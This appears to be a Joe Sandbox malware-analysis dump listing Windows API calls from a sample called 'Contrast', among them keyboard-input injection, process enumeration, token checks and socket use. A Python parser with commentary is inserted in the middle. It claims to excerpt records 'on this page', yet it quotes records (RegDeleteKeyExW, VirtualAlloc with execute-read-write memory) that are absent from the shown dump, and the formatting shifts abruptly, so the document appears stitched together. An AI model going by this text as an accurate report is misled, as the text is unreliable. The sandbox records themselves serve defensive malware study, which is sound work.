                                                                                                                                        • API String ID: 3659485706-0
                                                                                                                                        • Opcode ID: bd29c6eed40d45575af5947611578b4cfe899b34f3268bff1e07722b1416a7cb
                                                                                                                                        • Instruction ID: 39161573ed8e6d21e3bf626430af1156cc2ef57632eb14b8b8ded4a9f6352f59
                                                                                                                                        • Opcode Fuzzy Hash: bd29c6eed40d45575af5947611578b4cfe899b34f3268bff1e07722b1416a7cb
                                                                                                                                        • Instruction Fuzzy Hash: 65C12471A083119FC714EF28C48596ABBF4FF89714F04896EF899AB351D731E946CB82
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 005887AD
                                                                                                                                        • CoUninitialize.OLE32 ref: 005887B8
                                                                                                                                          • Part of subcall function 0059DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00588A0E,?,00000000), ref: 0059DF71
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 005887C3
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00588A94
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 780911581-0
                                                                                                                                        • Opcode ID: f6e80919f26e6dd2c546c57d32af786e76a650635c99375d03c6aa0e0086ef1c
                                                                                                                                        • Instruction ID: 28d4e3aaa240e9718115b113dccdc75ac95244ef0ecbaa785c52bf25705dd98f
                                                                                                                                        • Opcode Fuzzy Hash: f6e80919f26e6dd2c546c57d32af786e76a650635c99375d03c6aa0e0086ef1c
                                                                                                                                        • Instruction Fuzzy Hash: EBA14A75204B029FDB10EF54C485B6ABBE4FF88320F548849F995AB3A1DB30ED45CB92
                                                                                                                                        APIs
                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,005A3C4C,?), ref: 00568308
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,005A3C4C,?), ref: 00568320
                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,005A0988,000000FF,?,00000000,00000800,00000000,?,005A3C4C,?), ref: 00568345
                                                                                                                                        • _memcmp.LIBCMT ref: 00568366
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 314563124-0
                                                                                                                                        • Opcode ID: 096af0b2b1796bf72871a0e0058682cb8f0d24f32513b023886625907b976af5
                                                                                                                                        • Instruction ID: 2a156f9615518b943afeffaea46a24a7fd56069b35a6c90baab7d5581e782b39
                                                                                                                                        • Opcode Fuzzy Hash: 096af0b2b1796bf72871a0e0058682cb8f0d24f32513b023886625907b976af5
                                                                                                                                        • Instruction Fuzzy Hash: 54812B75A00109EFCB04DFD4C988EEEBBB9FF89315F204558E516AB250DB71AE06CB61
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2808897238-0
                                                                                                                                        • Opcode ID: 20cef9b3e95f751d473fe64607292a57b46ce39bd046c3543f0c040b1945db78
                                                                                                                                        • Instruction ID: 5e2b56be2aa877b17dfe79c7b033c603a1ec1a1c8e056c2358ac0a6ec7bebc0d
                                                                                                                                        • Opcode Fuzzy Hash: 20cef9b3e95f751d473fe64607292a57b46ce39bd046c3543f0c040b1945db78
                                                                                                                                        • Instruction Fuzzy Hash: 9E51A93060870A9BDB209F79D899A2DBBE5BF5D318B209C1FE556C7291EA709880CB05
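The per-function records above encode two things an analyst usually wants to pull out of a Joe Sandbox dump: the sample's real import table (each LoadLibraryA/GetProcAddress pair names the API being resolved at run time, and the String ID names the DLL even when only the GetProcAddress half of the pair is shown, as in the RegDeleteKeyExW record), and the behaviour implied by which APIs sit together in one function (VirtualAlloc with flProtect 0x40, i.e. PAGE_EXECUTE_READWRITE, next to _memmove; CreateToolhelp32Snapshot with Process32FirstW/Process32NextW for a process walk). The following is an added example that does that extraction; it is not Joe Sandbox code or code from the sample. The SAMPLE_RECORDS text is a constructed excerpt of the records on this page, the "Part of subcall function" lines are skipped because they belong to a callee, and the tag names ("dynamic-api-resolution", "rwx-allocation", "process-enumeration") are this example's own labels, not Joe Sandbox signature names.

```python
"""Recover dynamically resolved imports and coarse behaviour tags from the
per-function API records in this report.

Added example, not Joe Sandbox or sample code. It parses the
'Name.MODULE(args), ref: ADDR' layout used in the records above; SAMPLE_RECORDS
is a constructed excerpt of those records, and the tag names are this
example's own labels, not Joe Sandbox signature names."""
import re

# One API call line, e.g. "• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00591467"
API_LINE = re.compile(
    r"^\s*•\s+(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)
SUBCALL_LINE = re.compile(r"^\s*•\s+Part of subcall function")  # a callee's call, not this function's
FIELD_LINE = re.compile(r"^\s*•\s+(API ID|String ID|API String ID):\s*(.*)$")
HEX = re.compile(r"^[0-9A-Fa-f]+$")
PAGE_EXECUTE_READWRITE = 0x40  # VirtualAlloc flProtect value for RWX memory

# Constructed excerpt of the records on this page (same layout, fewer fields).
SAMPLE_RECORDS = """\
APIs
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00591467
Similarity
• String ID: RegDeleteKeyExW$advapi32.dll
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00525E3D), ref: 005255FE
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00525610
Similarity
• String ID: GetNativeSystemInfo$kernel32.dll
APIs
• CharLowerBuffW.USER32(?,?), ref: 0058E7A7
  • Part of subcall function 0058DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0058DEAE
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0058E9EA
• _memmove.LIBCMT ref: 0058E9FD
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0058F526
• Process32FirstW.KERNEL32(00000000,?), ref: 0058F534
  • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
• Process32NextW.KERNEL32(00000000,?), ref: 0058F5F4
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 0058F603
"""


def parse_records(text):
    """Split the dump into per-function records; each 'APIs' header starts one."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "fields": {}}
            records.append(cur)
        elif cur is None or SUBCALL_LINE.match(line):
            continue  # text before the first record, or a callee's call
        elif (m := API_LINE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur["apis"].append((m["name"], m["module"], args, m["ref"]))
        elif (f := FIELD_LINE.match(line)):
            cur["fields"][f.group(1)] = f.group(2).strip()
    return records


def resolved_imports(records):
    """Map each GetProcAddress target to the DLL it was resolved from.

    The DLL is LoadLibraryA's first argument when that call sits in the same
    record; otherwise it is taken from the String ID ('Api$module.dll'), which
    is all the first record on this page shows."""
    imports = {}
    for rec in records:
        dll = next((a[0].lower() for n, _m, a, _r in rec["apis"]
                    if n == "LoadLibraryA" and a), None)
        if dll is None:
            dll = next((p.lower() for p in rec["fields"].get("String ID", "").split("$")
                        if p.lower().endswith(".dll")), None)
        for n, _m, a, _r in rec["apis"]:
            if n == "GetProcAddress" and len(a) >= 2:
                imports[a[1]] = dll or "unknown"
    return imports


def capabilities(rec):
    """Coarse behaviour tags from which APIs occur together in one record."""
    names = {a[0] for a in rec["apis"]}
    tags = set()
    if "GetProcAddress" in names:
        tags.add("dynamic-api-resolution")
    if "CreateToolhelp32Snapshot" in names and names & {"Process32FirstW", "Process32NextW"}:
        tags.add("process-enumeration")
    for n, _m, a, _r in rec["apis"]:
        # VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
        if (n == "VirtualAlloc" and len(a) == 4 and HEX.match(a[3])
                and int(a[3], 16) == PAGE_EXECUTE_READWRITE):
            tags.add("rwx-allocation")
    return tags


if __name__ == "__main__":
    print(resolved_imports(parse_records(SAMPLE_RECORDS)))
```

Run against the full report text instead of SAMPLE_RECORDS, the resolved-import map is what the sample's static import table hides, and the tags give a quick per-function triage list to diff against the report's own signatures.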
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0058F526
• Process32FirstW.KERNEL32(00000000,?), ref: 0058F534
  • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
• Process32NextW.KERNEL32(00000000,?), ref: 0058F5F4
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 0058F603
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
APIs
• GetWindowRect.USER32(?,?), ref: 00599E88
• ScreenToClient.USER32(00000002,00000002), ref: 00599EBB
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00599F28
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
APIs
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0056A68A
• __itow.LIBCMT ref: 0056A6BB
  • Part of subcall function 0056A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0056A976
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 0056A724
• __itow.LIBCMT ref: 0056A77B
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 005870BC
• WSAGetLastError.WSOCK32(00000000), ref: 005870CC
  • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
  • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00587130
• WSAGetLastError.WSOCK32(00000000), ref: 0058713C
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,005A0980), ref: 00586B92
• _strlen.LIBCMT ref: 00586BC4
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00598F03
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• ClientToScreen.USER32(?,?), ref: 0059B1D2
• GetWindowRect.USER32(?,?), ref: 0059B248
• PtInRect.USER32(?,?,0059C6BC), ref: 0059B258
• MessageBeep.USER32(00000000), ref: 0059B2C9
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                        • Opcode ID: 073dd9edc571b243c146925aeae426407a25387a548d214612fd56756ba9ce19
                                                                                                                                        • Instruction ID: 3e8ad69af46684e81a9c4aa4153b4b0e7fbb179f42904597acc53e84078e6910
                                                                                                                                        • Opcode Fuzzy Hash: 073dd9edc571b243c146925aeae426407a25387a548d214612fd56756ba9ce19
                                                                                                                                        • Instruction Fuzzy Hash: 32418134A04119DFFF21CF98EA84A9D7FF5FF99310F1484AAE8189B251D730A845DB50
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00571326
                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00571342
                                                                                                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 005713A8
                                                                                                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 005713FA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                        • Opcode ID: 736eb8f2d2adf00dbaaa4ad785aaf98ca01fd953fc9a4255ac74b62dc787e7d9
                                                                                                                                        • Instruction ID: ee30ebc910ca95ada7e5e5da614ebeee9b120511894e0c5e5f76961636ece15e
                                                                                                                                        • Opcode Fuzzy Hash: 736eb8f2d2adf00dbaaa4ad785aaf98ca01fd953fc9a4255ac74b62dc787e7d9
                                                                                                                                        • Instruction Fuzzy Hash: B5316B30940A08AEFF348A2DAC09BFD7FB5BB85310F04CA0AF489525D0D3748945BB59
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00571465
                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00571481
                                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 005714E0
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00571532
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                        • Opcode ID: 02d9be382c759d0de4aebb279f27d6352ff91c369b42f1a2b0e71e9b6cbf4837
                                                                                                                                        • Instruction ID: 27b5e70d434c0a032c683c6bbe395e12476741330cb7b5adabb95091fb4e2449
                                                                                                                                        • Opcode Fuzzy Hash: 02d9be382c759d0de4aebb279f27d6352ff91c369b42f1a2b0e71e9b6cbf4837
                                                                                                                                        • Instruction Fuzzy Hash: 1B314B30940A595EFF348A6DBC05BFABFA6BB85310F08C31AE489521D1C3748945BB69
                                                                                                                                        APIs
                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0054642B
                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00546459
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00546487
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005464BD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                        • Opcode ID: 003ca39053cefdeb59825fa90deb1411193fbd7878c18048a8fe099ec23d6c7b
                                                                                                                                        • Instruction ID: 3b93cc645ede3d24f09b1b0c6a8dffd8700c9a802150bd0b0602b69000f44310
                                                                                                                                        • Opcode Fuzzy Hash: 003ca39053cefdeb59825fa90deb1411193fbd7878c18048a8fe099ec23d6c7b
                                                                                                                                        • Instruction Fuzzy Hash: 6631D031600256AFDF258F75CC88BEA7FA5FF42328F154428F82487191EB31E854DB52
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32 ref: 0059553F
                                                                                                                                          • Part of subcall function 00573B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00573B4E
                                                                                                                                          • Part of subcall function 00573B34: GetCurrentThreadId.KERNEL32 ref: 00573B55
                                                                                                                                          • Part of subcall function 00573B34: AttachThreadInput.USER32(00000000,?,005755C0), ref: 00573B5C
                                                                                                                                        • GetCaretPos.USER32(?), ref: 00595550
                                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 0059558B
                                                                                                                                        • GetForegroundWindow.USER32 ref: 00595591
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2759813231-0
                                                                                                                                        • Opcode ID: 2f50a9b2b8e73bc28f7a956ca69dc7b83cf78fd9a646ef85d4d027ea75ea990e
                                                                                                                                        • Instruction ID: 317f4852cd875837a84599b9f666734c63044e785310111cfb2b13797301755a
                                                                                                                                        • Opcode Fuzzy Hash: 2f50a9b2b8e73bc28f7a956ca69dc7b83cf78fd9a646ef85d4d027ea75ea990e
                                                                                                                                        • Instruction Fuzzy Hash: 75312EB1900109AFDB00EFA5DC859EFBBF9FF99314F10446AE515E7241EA71AE448FA0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                        • GetCursorPos.USER32(?), ref: 0059CB7A
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0054BCEC,?,?,?,?,?), ref: 0059CB8F
                                                                                                                                        • GetCursorPos.USER32(?), ref: 0059CBDC
                                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0054BCEC,?,?,?), ref: 0059CC16
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2864067406-0
                                                                                                                                        • Opcode ID: 795e4c53c9330b5ccb850a2d562d55178ec96ff3f4985d8711485fca2cef601f
                                                                                                                                        • Instruction ID: f2b6d673be2dfc8ce6d7fb17508d371936c80a0bffc52ff54124eaef692d9db0
                                                                                                                                        • Opcode Fuzzy Hash: 795e4c53c9330b5ccb850a2d562d55178ec96ff3f4985d8711485fca2cef601f
                                                                                                                                        • Instruction Fuzzy Hash: 3D318C35600058AFCF259F58C899EBA7FB6FB4E350F44409AF9059B2A1D7319D50EFA0
                                                                                                                                        APIs
                                                                                                                                        • __setmode.LIBCMT ref: 00530BE2
                                                                                                                                          • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00577E51,?,?,00000000), ref: 00524041
                                                                                                                                          • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00577E51,?,?,00000000,?,?), ref: 00524065
                                                                                                                                        • _fprintf.LIBCMT ref: 00530C19
                                                                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 0056694C
                                                                                                                                          • Part of subcall function 00534CCA: _flsall.LIBCMT ref: 00534CE3
                                                                                                                                        • __setmode.LIBCMT ref: 00530C4E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 521402451-0
                                                                                                                                        • Opcode ID: 7445541440747c5a30e2eee4c1b35e81b1d3dc34494109c3248079e296b1d30c
                                                                                                                                        • Instruction ID: a91a92bc04eb20418fc455842981017ff744029c0dd2a7460717dfd267006887
                                                                                                                                        • Opcode Fuzzy Hash: 7445541440747c5a30e2eee4c1b35e81b1d3dc34494109c3248079e296b1d30c
                                                                                                                                        • Instruction Fuzzy Hash: 0411277290420A6ADB08B7A4AC4FABEBF6DFF81320F100156F204571C2DF316D865BA1
APIs
  • Part of subcall function 00568D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00568D3F
  • Part of subcall function 00568D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00568D49
  • Part of subcall function 00568D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568D58
  • Part of subcall function 00568D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00568D5F
  • Part of subcall function 00568D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568D75
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005692C1
• _memcmp.LIBCMT ref: 005692E4
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 0056931A
• HeapFree.KERNEL32(00000000), ref: 00569321
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 005963BD
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 005963D7
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 005963E5
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005963F3
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
APIs
  • Part of subcall function 0056F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0056E46F,?,?,?,0056F262,00000000,000000EF,00000119,?,?), ref: 0056F867
  • Part of subcall function 0056F858: lstrcpyW.KERNEL32(00000000,?,?,0056E46F,?,?,?,0056F262,00000000,000000EF,00000119,?,?,00000000), ref: 0056F88D
  • Part of subcall function 0056F858: lstrcmpiW.KERNEL32(00000000,?,0056E46F,?,?,?,0056F262,00000000,000000EF,00000119,?,?), ref: 0056F8BE
• lstrlenW.KERNEL32(?,00000002,?,?,?,?,0056F262,00000000,000000EF,00000119,?,?,00000000), ref: 0056E488
• lstrcpyW.KERNEL32(00000000,?,?,0056F262,00000000,000000EF,00000119,?,?,00000000), ref: 0056E4AE
• lstrcmpiW.KERNEL32(00000002,cdecl,?,0056F262,00000000,000000EF,00000119,?,?,00000000), ref: 0056E4E2
Strings
Memory Dump Source
